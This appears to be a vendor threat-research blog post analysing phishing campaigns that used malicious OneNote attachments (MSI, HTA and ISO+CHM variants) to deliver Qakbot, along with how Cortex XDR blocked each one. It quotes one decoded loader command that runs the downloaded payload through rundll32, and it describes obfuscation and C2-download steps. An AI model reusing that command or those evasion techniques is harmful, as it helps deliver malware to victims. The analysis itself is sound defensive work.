The Adventures of Malicious OneNote Attachments in Cortex XDR Land

Executive Summary

The Cortex Threat Research team has been tracking recent campaigns that were using malicious OneNote email attachments as the initial attack vector. Malicious OneNote files have been made popular by various threat actors earlier this year, as a response to Microsoft blocking internet macros by default.

In correlation with Microsoft’s notice, starting in early 2023, OneNote infected attachments have been seen spreading malware such as Emotet, Qakbot, and AsyncRAT to name a few.

Similar to attacks delivering malicious Word macro attachments, various themed emails were seen sent at scale, luring potential victims into downloading an attached malicious OneNote file.

OneNote itself is installed by default as part of various versions of Microsoft Office installations, and allows embedding of macros.

Microsoft released another notice in April, stating that 120 extensions will be blocked by default in OneNote, disabling the user’s interaction with a OneNote file completely. These changes began rolling out with OneNote Version 2304 in April 2023, but for all users who have not yet updated, this attack vector is prevalent.

We observed multiple malware delivery methods techniques in the different campaigns, using various script types that serve as loaders, such as CScript, WScript, as well as running MSHTA files.

This writeup will examine some of the more salient techniques and provide insights on how Cortex XDR detects and blocks the infection chains derived from each file.

Initial Access and Structure

The initial access vector of OneNote malicious attachments consists of the “good old” method of luring the victim into opening an email containing a malicious attachment.

In the example below, we can see a targeted fake reply to a correspondence that is pretending to be of an urgent matter, in order to pressure the victim into opening the attached file. This email was part of a larger phishing campaign that targeted Italian-speaking users.

Figure 1. An email containing a malicious OneNote attachment

These malicious documents often feature intentionally blurred content, accompanied by a message that prompts the users to press a button with the promise of unblurring the content. Pressing on the said button enables the running of the malicious macro and ultimately triggers the infection chain.

The screenshot below depicts a malicious document that is pretending to be protected by a “security signature” of Microsoft Azure Cloud.

Figure 2. The content of the aforementioned OneNote malicious attachment

Extracting the MSI package’s content shows that these are all in fact just images, including the blurred “document” in the background. It is also interesting to note that the default names of the extracted image resources are in Russian and simply mean “unnamed painting”.

Figure 3. The images resources extracted from the OneNote file

Another example shows a decoy email in German. This shows how widespread these attacks are, focusing on multiple potential victims and countries.

After opening the attached document, a window using the Office 365 theme appears, prompting the user to download a document allegedly hosted on the cloud.

Figure 5. Another example of a malicious document content

The content of this document carries a malicious HTA file. After the user clicks on the “Open” button, they unknowingly execute the HTA file, and the JavaScript embedded in this file creates a fake popup message. The fake popup is used to divert the users’ attention from the fact that a malicious script is running in the background.

Figure 6. The fake message displayed while malicious code is running in the background

MSI Installer Variant

Once a user is successfully lured into clicking the aforementioned button, an MSI file is launched, including a malicious Windows script file that is actually bundled in it. Upon the installation of the MSI file the Windows script file is written to disk and then executed by the WScript engine.

Using the UniExtract2 tool, it is possible to reveal the aforementioned Windows script file that is bundled in the installation package.

The extracted script file is obfuscated and contains junk code. Parts of the script are also scattered in between benign text, such as excerpts from “Alice in Wonderland”, for example.

Figure 8. Contents of the Windows script including a benign text from Alice in Wonderland

By breaking the script into pieces and embedding them in large benign text files, the attackers attempt to thwart analysis efforts and evade detection by AV solutions.

Two scripts are eventually dropped on disk, in the %programdata% folder, by the Windows script.

Figure 9. Names of the two script files that are being dropped on disk

The scripts are executed in the background while the victim thinks they are installing Azure cloud software.

Figure 10. content of the two script files dropped on disk

The content of these two additional scripts, prior to being written to disk, is embedded in a hex-encoded form in the Windows script file. There are two strings which are especially noticeable.

Decoding the first hex encoded string reveals the code below. This code downloads a file from a remote command and control server (C2) and saves it to disk.

Figure 11. Content of the first decoded hex string

Decoding the second hex string reveals another piece of code, responsible for executing the previously downloaded file with the right exports method, “Motd”, using the Windows built-in Rundll32 binary. This is indicative that the dropped file is actually a DLL file, rather than a .tmp file as the name would suggest.

Figure 12. Content of the second decoded hex string

The final payload is the well established Qakbot malware, an information stealer, and formally a banking Trojan, that has been around since at least 2007.

The execution of the MSI installer was detected and prevented by Cortex XDR, as seen in the screenshots below.

Figure 13. The MSI installer process tree as seen in Cortex XDR in detect mode

Figure 14. The MSI installer process tree as seen in Cortex XDR in prevent mode

HTA File Variant

We observed another infection method using OneNote in a campaign that targeted German-speaking users. In this campaign, instead of an MSI installer, the attackers used an HTML Application (HTA) file.

The HTA file’s content is much shorter than the previous MSI variant’s Windows script, but it still contains some obfuscated strings. The string in its obfuscated form is depicted below.

Figure 15. Obfuscated content of the HTA file

Deobfuscating this string returns the following script, which reveals the main malicious functionality.

Figure 16. Deobfuscated content of the HTA file

This part of the script shows the usage of the curl utility in order to download a payload to the disk, masquerading it as a PNG file. The script then proceeds to display the fake pop up message that the document is corrupted, as depicted in the “Initial Access” section.

After the deobfuscation, the script content is written to the registry, under the key HKCU\\SOFTWARE\\rq5w\\xczis\\x4dyhu.

Finally, the freshly written key is being read from the registry, and if it exists then the part of the script below provides the url parameter to the curl utility to download the malicious payload. The registry value is then deleted.

Figure 17. The C2 URL as seen in the HTA file

Cortex XDR detected and prevented the execution of the mshta.exe file, as seen in the screenshots below.

Figure 18. The HTA file execution as seen in Cortex XDR in detect mode

Figure 19. The HTA file execution as seen in Cortex XDR in prevent mode

ISO + CHM Variant

We observed a third infection scenario that is an interesting combination of a bundled ISO image containing a CHM file. The theme of the document resembles the examples above. When the user clicks on the “Open” button, the ISO image that contains the CHM file is mounted.

Figure 20. The ISO image that is mounted on the user’s PC

After extracting the ISO file and the contents of the CHM file, we see the CHM file contains an additional command line that to be executed on click.

The Base64 encoded command line translates to the code that can be seen in figure 16. The encoded PowerShell command is in Base64 and decodes to start rundll32 $env:TEMP\PebbliestUndetractive.capriote, Motd;.

This time the attackers embedded an array of C2 servers, running in a loop, waiting for a successful connection in order to download and execute the Qakbot payload.

Figure 22. Base64 decoded PowerShell command

Cortex XDR detected and prevented the execution of the CHM file, as seen in the screenshots below.

Figure 23. The CHM file execution tree as seen in Cortex XDR in detect mode

Figure 24. The CHM file execution tree as seen in Cortex XDR in prevent mode

Protections and Mitigations

Cortex XDR customers are protected against different variations of infection chains using malicious OneNote attachments. The different scenarios described in detail above and their infection chains are detected and blocked by the Cortex XDR platform and can be seen in each scenario above and the respective detection and prevention screenshots.

In addition to the classic detection, the unique SmartScore engine translates security investigation methods and their associated data into a ML-driven hybrid risk scoring system. All three scenarios detailed in this blog scored higher than 95 out of 100 by SmartScore.